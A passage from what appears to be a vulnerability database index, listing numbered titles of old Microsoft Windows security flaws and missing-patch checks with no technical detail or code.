installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28336] Symantec VERITAS Backup Exec for Windows Server RPC interface buffer overflow [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge Base Article 917283 update is not installed [26861] Microsoft Windows Knowledge Base Article 918439 update is not installed [26834] Microsoft Windows TCP/IP protocol driver buffer overflow [26830] Microsoft Windows SMB invalid handle denial of service [26823] Microsoft Windows DHCP Client buffer overflow [26820] Microsoft Windows SMB Server service information disclosure [26818] Microsoft Windows Mailslot Server driver buffer overflow [26815] Microsoft Windows Graphics Rendering Engine (GRE) WMF code execution [26814] Microsoft Windows RRAS RASMAN buffer overflow [26813] Microsoft Windows Knowledge Base Article 916768 update is not installed [26812] Microsoft Windows RRAS buffer overflow [26809] Microsoft Windows ART image rendering library buffer overflow [26805] Microsoft Windows JScript code execution [26788] Microsoft Windows Media Player PNG buffer overflow [26487] Microsoft Windows NTDLL.DLL improper DOS to NT path conversion [26166] Microsoft Windows Knowledge Base Article 912442 update is not installed [26161] Microsoft Windows Knowledge Base Article 916803 update is not installed [26156] Microsoft Windows Knowledge Base Article 913580 update is not installed [25794] Microsoft Windows Knowledge Base Article 917627 update is not installed [25792] Microsoft Windows Knowledge Base Article 911567 update is not installed [25629] Microsoft Windows Knowledge Base Article 912812 update is not installed [25626] Microsoft Windows Knowledge Base Article 911562 update is not installed [25625] Microsoft Windows Knowledge Base Article 908531 not installed [25598] Microsoft Windows XP Firewall .exe firewall bypass [25597] Microsoft Windows XP Firewall ADS filename:stream syntax application alert bypass [25573] Microsoft Windows winhlp32.exe .hlp embedded image buffer overflow [25554] Microsoft Windows Explorer COM object code execution [25535] Microsoft Outlook Express Windows Address Book file buffer overflow [25370] Microsoft Windows Knowledge Base Article 901190 not installed [25369] Microsoft Windows DNS recursive query denial of service [25366] Microsoft Windows Knowledge Base Article 905755 update is not installed [25365] Microsoft Windows Knowledge Base Article 914798 update is not installed [25364] Microsoft Windows Knowledge Base Article 914451 update is not installed [25363] Microsoft Windows Knowledge Base Article 905756 update is not installed [25361] Microsoft Windows Knowledge Base Article 905758 update is not installed [25360] Microsoft Windows Knowledge Base Article 905754 update is not installed [25359] Microsoft Windows Knowledge Base Article 905555 update is not installed [25358] Microsoft Windows Knowledge Base Article 905646 update is not installed [25357] Microsoft Windows Knowledge Base Article 905757 update is not installed [25342] Microsoft Windows Knowledge Base Article 905553 update is not installed [25261] Microsoft Windows Knowledge Base Article 913433 is not installed [24586] Microsoft Windows DNS client ATMA data record buffer overflow [24512] Microsoft Windows Knowledge Base Article 911565 update is not installed [24511] Microsoft Windows Knowledge Base Article 911564 update is not installed [24509] Microsoft Windows Knowledge Base Article 889167 update is not installed [24496] Microsoft Windows Knowledge Base Article 911927 update is not installed [24495] Microsoft Windows Knowledge Base Article 913446 update is not installed [24494] Microsoft Windows Knowledge Base Article 910620 update is not installed [24493] Microsoft Windows Media Player Plugin EMBED element buffer overflow [24492] Microsoft Windows and Office Korean IME privilege elevation [24489] Microsoft Windows IGMP v3 denial of service [24488] Microsoft Windows Media Player BMP image parsing service buffer overflow [24474] Microsoft Windows 2000 LDAP client accepts untrusted CA [24473] Microsoft Windows 2000 event ID 565 not logged [24472] Microsoft Windows 2000 Event ID 1704 records incorrect group policy settings [24471] Microsoft Windows VDM information disclosure [24463] Microsoft Windows XP &quot [24407] Microsoft Windows 2000 SECEDIT command fails to set ACLs correctly [24405] Microsoft Windows 2000 UPN credentials with trailing dot group policy bypass [24403] Microsoft Windows 2000 WideCharToMultiByte() incorrect Japanese character conversion [24402] Microsoft Windows 2000 Terminal Service client IP not logged [24400] Microsoft Windows 2000 domain authentication can be bypassed by a local administrator [24157] Microsoft Windows wireless ad-hoc network unauthorized access [24044] Microsoft Windows GRE ExtCreateRegion() and ExtEscape() WMF denial of service [23978] Microsoft Windows Knowledge Base Article 912919 update is not installed [23926] Microsoft Windows Knowledge Base Article 908523 update is not installed [23924] Microsoft Windows Knowledge Base Article 908519 update is not installed [23922] Microsoft Windows embedded Open Type Web font buffer overflow [23846] Microsoft Windows GDI32.DLL WMF image rendering code execution [23453] Microsoft Windows COM object as ActiveX control allows execution of code [23450] Microsoft Windows Knowledge Base Article 905915 update is not installed [23447] Microsoft Windows APC queue list could allow elevated privileges [23284] Microsoft Windows SynAttackProtect denial of service [22899] Microsoft Windows Knowledge Base Article 902412 update is not installed [22882] Microsoft Windows Knowledge Base Article 896424 update is not installed [22877] Microsoft Windows Metafile image format buffer overflow [22876] Microsoft Windows Metafile and Enhance Metafile buffer overflow [22524] Microsoft Windows XP Wireless Zero Configuration service information disclosure [22514] Microsoft Windows Knowledge Base Article 902400 update is not installed [22512] Microsoft Windows Knowledge Base Article 907245 update is not installed [22502] Microsoft Windows Knowledge Base Article 905749 update is not installed [22501] Microsoft Windows Knowledge Base Article 900725 update is not installed [22498] Microsoft Windows XP tftp.exe heap overflow [22495] Microsoft Windows Collaboration Data Objects buffer overflow [22492] Microsoft Windows Knowledge Base Article 904706 update is not installed [22480] Microsoft Windows DirectShow .AVI file code execution [22479] Microsoft Windows HTML in preview fields execute code [22478] Microsoft Windows .lnk properties execute code [22477] Microsoft Windows .lnk file execute code [22476] Microsoft Windows Distributed Transaction Coordinator message denial of service [22475] Microsoft Windows Distributed Transaction Coordinator TIP denial of service [22473] Microsoft Windows COM code execution [22204] Microsoft Windows keybd_event or SendKeys allows elevated privileges [22156] Microsoft Windows Knowledge Base Article 899589 update is not installed [22089] Microsoft Windows Registry Editor Utility concealment [21980] Microsoft Windows Registry Editor Utility concealment [21978] Microsoft Windows user32.dll component denial of service [21954] Microsoft Windows Remote Desktop Protocol mstlsapi.dll Man-in-the-Middle [21931] Microsoft Windows XP memory leak [21895] Microsoft Windows Msdds.dll object command execution [21704] Microsoft Windows Knowledge Base Article 896727 update is not installed [21700] Microsoft Windows Client Service for NetWare code execution [21626] Microsoft Windows PKINIT protocol obtain information [21625] Microsoft Windows kerberos message denial of service [21605] Microsoft Windows Knowledge Base Article 896423 update is not installed [21604] Microsoft Windows print spooler buffer overflow [21603] Microsoft Windows Knowledge Base Article 899588 update is not installed [21602] Microsoft Windows Plug and Play buffer overflow [21601] Microsoft Windows Knowledge Base Article 899591 update is not installed [21600] Microsoft Windows Knowledge Base Article 893756 update is not installed [21599] Microsoft Windows telephony service buffer overflow [21539] Microsoft Windows USB device driver buffer overflow [21407] Microsoft Windows RDP request denial of service [21355] Microsoft Windows Network Connection Manager denial of service [21345] Microsoft Windows 2000 Update Rollup 1 for Service Pack 4 has not been installed [21272] Microsoft Windows Knowledge Base Article 903672 update is not installed [21269] Microsoft Windows Knowledge Base Article 901214 update is not installed [21221] Microsoft Windows Color Management Module buffer overflow [21214] Microsoft Windows NTFS allows attacker to obtain information [20829] Microsoft Windows Step-by-Step Interactive Training bookmark link file buffer overflow [20826] Microsoft Windows Knowledge Base Article 896422 update is not installed [20825] Microsoft Windows Knowledge Base Article 896358 update is not installed [20823] Microsoft Windows Knowledge Base Article 890169 update is not installed [20822] Microsoft Windows Knowledge Base Article 883939 update is not installed [20821] Microsoft Windows compiled Help (.CHM) integer overflow [20820] Microsoft Windows Knowledge Base Article 896426 update is not installed [20818] Microsoft Windows WebClient Service buffer overflow [20815] Microsoft Windows SMB process gain access [20629] Multiple Microsoft Windows IPv6 LAND denial of service [20546] Microsoft Windows Media Player allows creation of malicious media files [20382] Microsoft Windows Knowledge Base Article 894320 update is not installed [20380] Microsoft Windows Web View command execution [20318] Microsoft Windows Knowledge Base Article 893086 update is not installed [20317] Microsoft Windows Knowledge Base Article 890923 update is not installed [20000] Microsoft Windows Knowledge Base Article 892944 update is not installed [19969] Multiple Microsoft Windows Server 2003 Edition printer driver denial of service [19965] Multiple Microsoft Windows Server 2003 Editions SMB redirector denial of service [19843] Microsoft Windows Knowledge Base Article 894549 update is not installed [19836] Microsoft Windows CSRSS gain control [19835] Microsoft Windows HTML Application Host command execution [19834] Microsoft Windows object buffer overflow [19832] Microsoft Windows access requests gain privileges [19830] Microsoft Windows font buffer overflow [19829] Microsoft Windows Message Queuing component buffer overflow [19819] Microsoft Windows Remote Desktop &quot [19727] Microsoft Windows 2000 GDI32.DLL denial of service [19593] Microsoft Windows LAND denial of service [19288] IBM DB2 running on Microsoft Windows obtain information [19270] Microsoft Windows PNG image buffer overflow [19220] Microsoft Windows registry key connection denial of service [19110] Microsoft Windows Hyperlink Object Library code execution [19109] Microsoft Windows OLE code execution [19105] Microsoft Windows COM files gain privileges [19103] Multiple Microsoft Windows TCP/IP denial of service [19101] Microsoft Windows Servers License Logging service code execution [19096] Microsoft Windows Media Player PNG buffer overflow [19093] Microsoft Windows named pipe information disclosure [19091] Microsoft Windows SharePoint Services and SharePoint Team Services cross-site scripting [19089] Microsoft Windows SMB code execution [18879] Microsoft Windows USER32.DLL ANI header overflow [18768] Microsoft Windows Knowledge Base Article 891711 update is not installed [18766] Microsoft Windows Knowledge Base Article 871250 update is not installed [18758] Microsoft Windows Indexing Service allows code execution [18678] Microsoft Windows winhlp32.exe buffer overflow [18668] Microsoft Windows LoadImage API buffer overflow [18667] Microsoft Windows ANI file zero rate number overflow denial of service [18587] Microsoft Windows Media Player ActiveX object reveals existence of files [18576] Microsoft Windows Media Player mp3 code execution [18507] Microsoft Windows XP SP2 subnet option allows access to firewall exceptions [18394] Microsoft Windows Knowledge Base Article 870763 update is not installed [18393] Microsoft Windows Knowledge Base Article 873339 update is not installed [18392] Microsoft Windows Knowledge Base Article 885249 update is not installed [18391] Microsoft Windows Knowledge Base Article 885835 update is not installed [18390] Microsoft Windows Knowledge Base Article 885836 update is not installed [18378] Microsoft Windows Icon image anomaly detected [18342] Microsoft Windows NT DHCP HardwareAddress code execution [18341] Microsoft Windows NT DHCP MachineName denial of service [18340] Microsoft Windows LSASS gain privileges [18339] Microsoft Windows kernel LPC interface gain privileges [18338] Microsoft Windows Word for Windows 6.0 Converter font code execution [18337] Microsoft Windows Word for Windows 6.0 Converter table code execution [18336] Microsoft Windows HyperTerminal session file buffer overflow [18314] Microsoft Windows Knowledge Base Article 889293 update is not installed [18208] Microsoft Windows logon screen saver allows elevated privileges [17864] Microsoft Windows XP Explorer WAV file denial of service [17711] Microsoft Windows XP SP2 sessmgr.exe firewall bypass [17663] Microsoft Windows MS04-029 patch is not installed [17662] Microsoft Windows MS04-037 patch is not installed [17661] Microsoft Windows MS04-036 patch is not installed [17660] Microsoft Windows MS04-035 patch is not installed [17659] Microsoft Windows MS04-034 patch is not installed [17658] Microsoft Windows MS04-032 patch is not installed [17657] Microsoft Windows NetDDE MS04-031 patch is not installed [17641] Microsoft Windows NNTP buffer overflow [17624] Microsoft Windows XP and Windows Server 2003 Compressed Folders buffer overflow [17621] Microsoft Windows 2003 SMTP service code execution [17560] Microsoft Windows 2000 and XP GDI library denial of service [17521] Microsoft Windows 2000 Service Pack 4 is not installed [17458] Microsoft Windows CE KDataStruct information disclosure [17457] Microsoft Windows XP Explorer.exe TIFF denial of service [17455] Microsoft Windows XP information disclosure [17412] IBM with Microsoft Windows XP Professional has default administrator account [17341] Microsoft Windows MS04-028 patch is not installed [17052] Microsoft Windows XP and Internet Explorer displays improper file icon [17051] Microsoft Windows XP Content-Location bypass Local Computer zone restrictions [17023] Microsoft Windows XP Windows Explorer bypass Zone Identifier (ZoneID) feature [17009] Microsoft Windows XP ICF bypass filter [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [16913] Microsoft Windows 2003 users with Synchronize directory service data privilege [16912] Microsoft Windows 2003 groups with Synchronize directory service data privilege [16909] Microsoft Windows 2003 groups with Remove computer from docking station privilege [16907] Microsoft Windows 2003 users with Create global objects privilege [16905] Microsoft Windows 2003 users or groups with Create global objects privilege [16851] Microsoft Windows 2003 and XP WinKey and U key denial of service [16704] Microsoft Windows 2000 Media Player control code execution [16664] Microsoft Windows Program Group Converter buffer overflow [16627] Microsoft Windows System32 write file to the directory has been detected [16597] Microsoft Windows Windows Shell allows code execution [16592] Microsoft Windows Utility Manager gain privileges [16591] Microsoft Windows Task Scheduler buffer overflow [16590] Microsoft Windows POSIX buffer overflow allows local attacker to gain privileges [16587] Microsoft Windows Network Dynamic Data Exchange Running [16586] Microsoft Windows HTML Help could allow execution of code [16582] Microsoft Windows Server 2003 kernel CPU denial of service [16581] Microsoft Windows Enhanced Metafile (EMF) buffer overflow [16580] Microsoft Windows Virtual DOS Machine (VDM) allows elevated privileges [16579] Microsoft Windows Window Management API allows elevated privileges [16572] Microsoft Windows 2003 Users with Impersonate a client after authentication privilege [16570] Microsoft Windows 2003 Users with Create global objects privilege [16564] Microsoft Windows 2003 Groups with Create global objects privilege [16562] Microsoft Windows 2003 Groups with &quot [16556] Microsoft Windows NetDDE buffer overflow [16522] Microsoft Windows 2003 Impersonate a client after authentication privilege [16521] Microsoft Windows 2003 Deny Logon Through Terminal Services privilege [16520] Microsoft Windows 2003 Create global objects privilege [16362] Microsoft Windows XP Help Center and Support starts automatically [16304] Microsoft Windows JPEG buffer overflow [16276] Microsoft Windows 2000 Advanced Server fully qualified domain name security bypass [16270] Microsoft Windows IPSec filter bypass [16213] Microsoft Windows Local Security Authority buffer overflow exploit attempt detected [16211] Microsoft Windows Service Host buffer overflow exploit attempt detected [16210] Microsoft Windows Service Host buffer overflow exploit attempt detected [16207] Microsoft Windows kernel buffer overflow exploit attempt detected [16206] Microsoft Windows Command Shell buffer overflow exploit attempt detected [16171] Microsoft Windows XP Explorer code execution [16154] Microsoft Windows NT 4.0 TSE Security Patch denial of service [16095] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15956] Microsoft Windows long file share name buffer overflow [15818] Microsoft Windows MS04-011 patch is not installed [15813] Microsoft Windows MS04-014 patch is not installed [15811] Microsoft Windows MS04-012 patch is not installed [15715] Microsoft Windows Negotiate Security Software Provider buffer overflow [15714] Microsoft Windows Virtual DOS Machine allows elevated privileges [15713] Microsoft Windows ASN.1 double-free [15711] Microsoft Windows object identifier could be used to open network ports [15710] Microsoft Windows H.323 buffer overflow [15707] Microsoft Windows Local Descriptor Table allows privilege escalation [15704] Microsoft Windows XP and Windows Server 2003 HCP URL code execution [15702] Microsoft Windows winlogon buffer overflow [15700] Microsoft Windows 2000 Domain Controller LSASS LDAP message denial of service [15699] Microsoft Windows LSASS buffer overflow [15678] Microsoft Windows XP task creation allows privilege escalation [15632] Microsoft Windows 2000 Utility Manger allows privilege escalation [15589] Microsoft Windows allows elevated privileges [15507] Microsoft Windows XP Explorer wmf denial of service [15461] Microsoft Windows MS04-008 patch is not installed [15394] Microsoft Windows service running under non-built-in accounts has been detected [15284] Microsoft Windows XP Windows shell shimgvw.dll buffer overflow [15263] Microsoft Windows XP and 2000 Server kernel allows elevated privileges [15256] Microsoft Windows ASN.1 buffer overflow packet using NTLM has been detected [15255] Microsoft Windows ASN.1 buffer overflow packet using SMTP has been detected [15223] Microsoft Windows access violation or exception code has been detected [15218] Microsoft Windows command shell backdoor [15101] Microsoft Windows XP helpctr.exe cross-site scripting [15057] Microsoft Windows XP and Windows Server 2003 smbmount Linux client denial of service [15039] Microsoft Windows ASN.1 Library buffer overflow [15038] Microsoft Windows 2000 Server Windows Media Services denial of service [15037] Microsoft Windows Server 2003 WINS /GS flag denial of service [14924] Microsoft Windows XP folder containing HTML code and executable file code execution [13786] Microsoft Windows MS03-051 patch is not installed [13785] Microsoft Windows MS03-048 patch is not installed [13784] Microsoft Windows MS03-050 patch is not installed [13639] Microsoft Windows Workstation buffer overflow [13638] Microsoft Windows MS03-049 patch is not installed [13558] Microsoft Windows XP CommCtl32.dll could allow an attacker to execute code [13509] Microsoft Windows HTML Help could allow an attacker to gain privileges [13482] Microsoft Windows MS03-047 patch is not installed [13480] Microsoft Windows MS03-046 patch is not installed [13478] Microsoft Windows MS03-044 patch is not installed [13473] Microsoft Windows MS03-045 patch is not installed [13472] Microsoft Windows MS03-042 patch is not installed [13471] Microsoft Windows MS03-041 patch is not installed [13444] Microsoft Windows Non-English patched with MS03-045 denial of service in Sophos Anti-Virus [13424] Microsoft Windows User32.dll ListBox and ComboBox controls buffer overflow [13423] Microsoft Windows 2000 Local Troubleshooter ActiveX control buffer overflow [13422] Microsoft Windows Authenticode could allow an attacker to execute code [13420] Microsoft Windows HSC HCP protocol file buffer overflow [13413] Microsoft Windows Messenger Service popup buffer overflow [13412] Microsoft Windows MS03-043 patch is not installed [13407] Microsoft Windows 2000 Server mqsvc.exe MQLocateBegin packet buffer overflow [13385] Microsoft Windows Server 2003 &quot [13375] Microsoft Windows Media Player Dynamic HTML behaviors allows an attacker to execute code [13364] Microsoft Windows MS03-040 patch is not installed [13344] Microsoft Windows 98 flood of fragmented UDP packets causes denial of service [13342] Microsoft Windows PostThreadMessage API allows processes to be terminated without permission [13211] Microsoft Windows 2000 and XP URG memory leak [13183] Microsoft Windows service pack detected [13171] Microsoft Windows Server 2003 can allow attacker to bypass mechanism used to detect buffer overflows [13134] Microsoft Windows MS03-039 patch is not installed [13131] Microsoft Windows 2000 Message Queue Manager buffer overflow [13105] Microsoft Windows Update fails to notify users of updates when host-blocking is used [13095] Microsoft Windows auto update is disabled [13089] Microsoft Windows NetBIOS Name Service information disclosure [12903] Microsoft Windows command shell banner [12835] Microsoft Windows Pocket PC could allow an attacker to gain access [12762] Microsoft Windows NT 4.0 Q823803i patch RRAS denial of service [12724] Microsoft Windows Media Player ASF file could allow code execution [12701] Microsoft Windows NT 4.0 Server file management function denial of service [12652] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension POST request buffer overflow [12620] Microsoft Windows 2000 Server SMTP FILETIME denial of service [12544] Microsoft Windows Servers SMB packet buffer overflow [12543] Microsoft Windows 2000 Accessibility Utility Manager could allow an attacker to gain privileges [12533] Microsoft Windows MS03-010 patch is not installed [12521] Microsoft Windows Rundll32.exe overly long routine name buffer overflow [12493] Microsoft Windows Shell32.dll 2000 ShellExecute function buffer overflow [12489] Microsoft Windows 2000 Server Active Directory buffer overflow [12442] Microsoft Windows XP SP1 Windows shell desktop.ini buffer overflow [12440] Microsoft Windows Media Player ActiveX control could disclose sensitive information [12187] Microsoft Windows XP gethostbyaddr() denial of service [12128] Microsoft Windows 2000 and Windows NT MS03-019 patch is not installed [12092] Microsoft Windows 2000 and NT 4.0 Server IIS ISAPI nsiislog.dll extension buffer overflow [12048] Microsoft Windows 2000 and Windows Server 2003 LAN Manager hash creation enabled [11953] Microsoft Windows Media Player skin downloading could allow an attacker to execute code [11824] Microsoft Windows XP Service Control Manager (SCM) race condition [11822] Microsoft Windows regedit.exe command execution [11816] Microsoft Windows 2000 Terminal Services MSGINA.DLL insecure access permissions [11810] Microsoft Windows win2k.sys EngTextOut denial of service [11803] Microsoft Windows kernel LpcRequestWaitReplyPort() buffer overflow [11696] Microsoft Windows 2000 Terminal Services man-in-the-middle attack [11617] Microsoft Windows 2000 MS03-007 patch is not installed on the system [11575] Microsoft Windows Script Engine buffer overflow [11546] Microsoft Windows 2000 Windows Help Facility .cnt file buffer overflow [11536] Microsoft Windows PostMessage() API function could disclose password [11505] Microsoft Windows XP Safe Mode bypass [11425] Microsoft Windows Me HSC hcp:// buffer overflow [11344] Microsoft Windows riched20.dll attribute label buffer overflow [11329] Microsoft Windows NT and 2000 cmd.exe CD path name buffer overflow [11274] Microsoft Windows 2000 NetBIOS continuation packets denial of service [11260] Microsoft Windows XP Windows Redirector buffer overflow [11216] Microsoft Windows NT and 2000 command prompt denial of service [11141] Microsoft Windows 2000 Terminal Services MSGINA.DLL denial of service [11132] Microsoft Windows Locator service buffer overflow [11030] Microsoft Windows OpenType font (.otf) fontview denial of service [10958] Microsoft Windows File Protection certificate chains with a trusted root CA are accepted [10957] Microsoft Windows File Protection fails to remove old security catalog .CAT files [10892] Microsoft Windows XP Shell media file buffer overflow [10843] Microsoft Windows 2000 and XP SMB signing group policy modification [10764] Microsoft Windows XP wireless LAN feature could leak information [10736] Microsoft Windows XP Fast User Switching could disclose user processes [10431] Microsoft Windows 2000 SNMP LANMAN Extension memory leak denial of service [10398] Microsoft Windows Media Player world-writable executables [10377] Microsoft Windows XP and 2000 administrative alerts fail when security event log is full [10343] Microsoft Windows NetDDE Agent can be used to gain elevated privileges [10279] Microsoft Windows XP &quot [10259] Microsoft Services for Unix (SFU) invalid RPC packet denial of service [10258] Microsoft Services for Unix (SFU) RPC parameter size buffer overflow could crash the server [10254] Microsoft Windows compiled HTML Help (.chm) files could be used to execute code [10253] Microsoft Windows HTML Help ActiveX buffer overflow [10252] Microsoft Windows zipped file decompression incorrect target path [10251] Microsoft Windows zipped file decompression buffer overflow [10215] Microsoft Windows Scripting Host is running on the system [10199] Microsoft Windows 2000/XP PPTP packet buffer overflow [10132] Microsoft Windows fails to properly check execute permissions for 16-bit executable files [10122] Microsoft Windows Remote Desktop Protocol could allow an attacker to monitor keystrokes [10121] Microsoft Windows Remote Desktop Protocol checksum information leak [10120] Microsoft Windows XP Remote Desktop malformed PDU Confirm Active packet denial of service [9982] Microsoft Windows Certificate Enrollment Control ActiveX control could be used to delete digital certificates [9971] Microsoft Windows Media Player .wmf file extension or content type spoofing [9953] Microsoft Windows Media Player WMD code execution [9946] Microsoft Windows 2000 Terminal Services session screensaver fails to lock the console [9933] Microsoft Windows NT/2000/XP SMB packet request buffer overflow [9878] Microsoft Windows XP Help and Support Center HCP:// URL could be used to delete files [9869] Microsoft Windows NTFS hard links could bypass event auditing logs [9856] Microsoft Windows 2000 NCM handler routine could allow elevated privileges [9789] Microsoft Exchange MSRPC denial of service [9779] Microsoft Windows 2000 weak system partition permissions [9752] Microsoft Windows 2000 Service Pack 3 is not installed [9746] Microsoft Windows 2000 HTML Help item parameter buffer overflow [9727] Microsoft Windows Media Player mplay32 long file name buffer overflow [9625] Microsoft Windows 2000 Narrator allows login information to be audible [9422] Microsoft Windows Media Player Active Playlist could allow local HTML script execution [9421] Microsoft Windows Media Player WMDM service invalid resource connection could allow elevated privileges [9420] Microsoft Windows Media Player cache path disclosure could allow remote execution of code [8918] Microsoft Windows XP Remote Desktop Access is enabled [8915] Microsoft Windows XP Internet Configuration Firewall is disabled [8892] Microsoft Windows XP &quot [8891] Microsoft Windows XP option to digitally sign server communications disabled [8890] Microsoft Windows XP option to digitally sign client communications when server agrees disabled [8889] Microsoft Windows XP option to digitally sign server communications when client agrees disabled [8888] Microsoft Windows XP security option to digitally sign client communications disabled [8882] Microsoft Windows XP Session security for NTLM SSP based servers is below minimum [8880] Microsoft Windows XP Session security for NTLM SSP based clients is below minimum [8867] Microsoft Windows 2000 LanMan denial of service [8813] Microsoft Windows 2000 Terminal Services allows attacker to bypass group policy settings [8759] Microsoft Windows 2000 could allow an attacker to block the application of Group Policy settings [8752] Microsoft Windows NT, 2000, and XP MUP buffer overflow [8739] Microsoft Windows 2000 DCOM memory leak [8728] Microsoft Windows Registry remote write audit [8727] Microsoft Windows Registry remote access audit [8621] Microsoft Internet Explorer on Windows Me fails to prompt user when a cookie is stored if set using JavaScript [8604] Microsoft Outlook allows an attacker to execute JavaScript code by using IFRAME tags to reference malicious Windows Media Player file [8559] Microsoft Windows registry security SAM read [8512] Microsoft Windows NT security ID lookup [8509] Microsoft Windows startup folder access [8462] Microsoft Windows NT/2000 debugging subsystem allows attacker to create duplicate handles [8402] Microsoft Windows 2000 allows an attacker to bypass password policy [8388] Microsoft Windows NT Server with IIS 4.0 could allow users to bypass &quot [8384] Microsoft Windows Shell buffer overflow can occur when an application has been improperly removed [8307] Microsoft Windows 2000, Windows XP, and Exchange 2000 SMTP data transfer command denial of service [8304] Microsoft Windows 2000 and Exchange 5.5 SMTP service unauthorized mail privileges [8231] Microsoft Windows NT SNMP OID decoding memory leak [8209] Microsoft Windows XP CIFS port denial of service [8207] Microsoft Windows XP UDP port denial of service [8199] Microsoft Windows 2000 Terminal Services unlocked client [8094] Microsoft Windows 2000 and Interix 2.2 Telnet protocol option buffer overflow [8077] Microsoft Windows Messenger and/or MSN Messenger is present on the system [8043] Microsoft Windows NT, 2000, and XP using NTFS could allow files to be hidden [8037] Microsoft Windows 2000 empty TCP packet denial of service [8023] Microsoft Windows NT and Windows 2000 SIDs could allow an attacker to gain elevated privileges in another domain [8000] Microsoft Windows XP &quot [7922] Microsoft Windows XP Pro Upgrade installation causes security patches for Internet Explorer to be rolled back [7892] Microsoft Windows 95 Backup long file extension buffer overflow [7800] Microsoft Internet Explorer Windows Media Player ActiveX could allow an attacker to determine the existence of files or directories [7732] Microsoft Windows XP Remote Desktop sends username in plain text [7731] Microsoft Windows XP fast user switching could lockout users except administrator [7722] Microsoft Windows XP, Me, 98, and 98SE UPnP spoofed UDP packet with SSDP announcement denial of service attack [7721] Microsoft Windows XP, Me, 98, and 98SE UPnP malformed NOTIFY directive buffer overflow [7713] Microsoft Windows XP allows attacker to execute programs using hotkeys without authentication [7709] Microsoft Windows multiple vendor Web browser high image count denial of service [7667] Microsoft Windows 2000 IKE UDP packet flood denial of service [7605] Microsoft Windows XP helpctr.exe buffer overflow [7542] Microsoft Windows 95 and 98 with multiple TCP/IP stacks ICMP packet denial of service [7538] Microsoft Windows 2000 and XP Terminal services allow an attacker to spoof IP addresses [7533] Microsoft Windows 2000 RunAs service denial of service [7532] Microsoft Windows 2000 RunAs service allows local attacker to bypass pipe authentication [7531] Microsoft Windows 2000 RunAs service reveals sensitive information [7527] Microsoft SQL Server malformed RPC request denial of service [7526] Microsoft Exchange Server malformed RPC request denial of service [7428] Microsoft Windows Me and XP UPnP denial of service [7422] Microsoft Windows NT RSHSVC does not properly validate users [7421] Microsoft Windows NT GetThreadContext/SetThreadContext denial of service [7409] Microsoft Windows 2000 and Windows XP GDI denial of service [7405] Microsoft Windows NT NonPagedPool denial of service [7403] Microsoft Windows NT Win32k.sys denial of service [7402] Microsoft Windows NT kernel mode handle-closing denial of service [7401] Microsoft Windows NT group policies not applied if long DC name [7400] Microsoft Windows NT user policies not updated [7398] Microsoft Windows NT symbolic link case elevation of privileges [7391] Microsoft Windows NT strong passwords may allow parts of the full name [7369] Microsoft Windows CSRSS.EXE denial of service [7329] Microsoft Windows NT WINS malformed packet flood denial of service [7318] Microsoft Windows ME SSDP service denial of service [7302] Microsoft Windows NT and 2000 Terminal Server malformed RDP packet series denial of service [7231] Microsoft Windows 95 using NetWare remote administration contains hidden share [7224] Microsoft Windows NT smbmount request from Linux client denial of 